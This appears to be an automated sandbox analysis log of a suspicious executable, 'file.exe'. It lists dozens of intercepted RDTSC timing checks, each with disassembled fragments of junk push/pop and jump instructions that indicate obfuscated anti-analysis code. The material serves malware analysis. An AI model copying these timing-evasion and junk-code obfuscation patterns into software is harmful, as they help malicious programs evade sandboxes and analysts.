Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E1F second address: 5B5E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E2F second address: 5B5E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E34 second address: 5B5E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA6C4C2AB45h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5E65 second address: 5B5E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B5F15 second address: 5B5F19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6021 second address: 5B6091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007FA6C4D39094h 0x0000000e nop 0x0000000f call 00007FA6C4D39091h 0x00000014 mov esi, dword ptr [ebp+122D2961h] 0x0000001a pop esi 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D25B2h], edi 0x00000025 mov ecx, 0C71D491h 0x0000002a popad 0x0000002b pop edx 0x0000002c call 00007FA6C4D39089h 0x00000031 ja 00007FA6C4D3909Ch 0x00000037 jmp 00007FA6C4D39096h 0x0000003c push eax 0x0000003d pushad 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6091 second address: 5B609A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B609A second address: 5B60D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FA6C4D39099h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jl 00007FA6C4D3909Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6C4D3908Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B60D4 second address: 5B6144 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jng 00007FA6C4C2AB42h 0x00000014 pop eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA6C4C2AB38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000003h 0x00000031 or edx, dword ptr [ebp+122D2B8Dh] 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D1DE3h] 0x0000003f push 00000003h 0x00000041 mov edi, eax 0x00000043 push 9E7D6B5Ch 0x00000048 pushad 0x00000049 jo 00007FA6C4C2AB3Ch 0x0000004f jc 00007FA6C4C2AB36h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B61BB second address: 5B61DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D29ADh] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D1E12h], edi 0x00000017 push 00D677CBh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B61DC second address: 5B6247 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA6C4C2AB38h 0x0000000c popad 0x0000000d xor dword ptr [esp], 00D6774Bh 0x00000014 add di, 5B97h 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA6C4C2AB38h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 add dword ptr [ebp+122D246Fh], esi 0x0000003b mov ch, al 0x0000003d push 00000000h 0x0000003f movsx edx, di 0x00000042 push 00000003h 0x00000044 jmp 00007FA6C4C2AB3Dh 0x00000049 adc dl, 00000020h 0x0000004c call 00007FA6C4C2AB39h 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pop eax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6247 second address: 5B628F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FA6C4D39095h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 pop esi 0x00000017 push ecx 0x00000018 jp 00007FA6C4D39086h 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA6C4D39092h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B628F second address: 5B6293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5B6293 second address: 5B631E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6C4D39099h 0x0000000c jmp 00007FA6C4D39090h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jno 00007FA6C4D39092h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007FA6C4D39095h 0x00000024 pop eax 0x00000025 mov esi, dword ptr [ebp+122D2975h] 0x0000002b lea ebx, dword ptr [ebp+12459D29h] 0x00000031 xchg eax, ebx 0x00000032 jbe 00007FA6C4D3908Eh 0x00000038 push ecx 0x00000039 jg 00007FA6C4D39086h 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA6C4D3908Dh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B57 second address: 5D5B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B6C second address: 5D5B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6C4D39099h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D399D second address: 5D39A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D3FB2 second address: 5D3FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D3FB6 second address: 5D3FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D42B3 second address: 5D42D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Ch 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA6C4D39086h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D45FF second address: 5D4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4603 second address: 5D4607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4607 second address: 5D4613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4C2AB36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4613 second address: 5D4622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D3908Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4622 second address: 5D4628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4628 second address: 5D463B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jnc 00007FA6C4D39086h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47A1 second address: 5D47A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47A6 second address: 5D47AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47AE second address: 5D47B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47B2 second address: 5D47EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Dh 0x00000007 je 00007FA6C4D39086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FA6C4D39099h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jp 00007FA6C4D390A4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D47EE second address: 5D47F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC46 second address: 5CAC62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA6C4D39096h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC62 second address: 5CAC72 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CAC72 second address: 5CAC76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5404 second address: 5D5416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA6C4C2AB36h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D570E second address: 5D5732 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 jnl 00007FA6C4D39086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D59D3 second address: 5D59D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D8089 second address: 5D808F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02B6 second address: 5A02BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02BA second address: 5A02C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02C7 second address: 5A02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02CD second address: 5A02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02D1 second address: 5A02FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FA6C4C2AB36h 0x0000000d jmp 00007FA6C4C2AB45h 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007FA6C4C2AB36h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A02FC second address: 5A030F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4D3908Eh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E138C second address: 5E13B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FA6C4C2AB52h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E13B3 second address: 5E13C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E154F second address: 5E1555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1555 second address: 5E155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E155B second address: 5E1587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA6C4C2AB3Ah 0x0000000a pop edi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6C4C2AB47h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1587 second address: 5E158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E158B second address: 5E158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E16BD second address: 5E16C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1C49 second address: 5E1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1C4D second address: 5E1C5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3AD8 second address: 5E3ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3BCB second address: 5E3BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3D72 second address: 5E3D88 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jp 00007FA6C4C2AB36h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3E59 second address: 5E3E70 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA6C4D3908Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3E70 second address: 5E3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3F35 second address: 5E3F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3F3A second address: 5E3F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3FD5 second address: 5E3FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA6C4D39086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA6C4D3908Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E3FED second address: 5E3FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4480 second address: 5E44EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6C4D39086h 0x0000000a popad 0x0000000b pop esi 0x0000000c mov dword ptr [esp], eax 0x0000000f add edi, dword ptr [ebp+122D2ADDh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FA6C4D39088h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FA6C4D39088h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d push ebx 0x0000004e movzx esi, di 0x00000051 pop esi 0x00000052 push eax 0x00000053 jnp 00007FA6C4D39090h 0x00000059 pushad 0x0000005a push eax 0x0000005b pop eax 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D10 second address: 5E4D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E56CF second address: 5E56DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA6C4D39086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E4D14 second address: 5E4D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6C4C2AB43h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FA6C4C2AB3Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EA4 second address: 5E5EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EA8 second address: 5E5EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EAC second address: 5E5EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EB2 second address: 5E5EBC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA6C4C2AB3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5EBC second address: 5E5F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FA6C4D39088h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov si, 8300h 0x00000029 push 00000000h 0x0000002b jo 00007FA6C4D3908Ch 0x00000031 xor dword ptr [ebp+122D25B2h], eax 0x00000037 mov dword ptr [ebp+122D1D33h], eax 0x0000003d push eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jl 00007FA6C4D39086h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E5F07 second address: 5E5F15 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68F2 second address: 5E68F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66C2 second address: 5E66D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68F6 second address: 5E68FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66D3 second address: 5E66F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007FA6C4C2AB48h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E68FD second address: 5E690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007FA6C4D39094h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66F6 second address: 5E66FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E66FA second address: 5E66FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7BDB second address: 5E7BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E8610 second address: 5E8614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E7BDF second address: 5E7BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC134 second address: 5EC13E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE4CC second address: 5EE4D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC877 second address: 5EC88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4D39094h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EE66A second address: 5EE66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
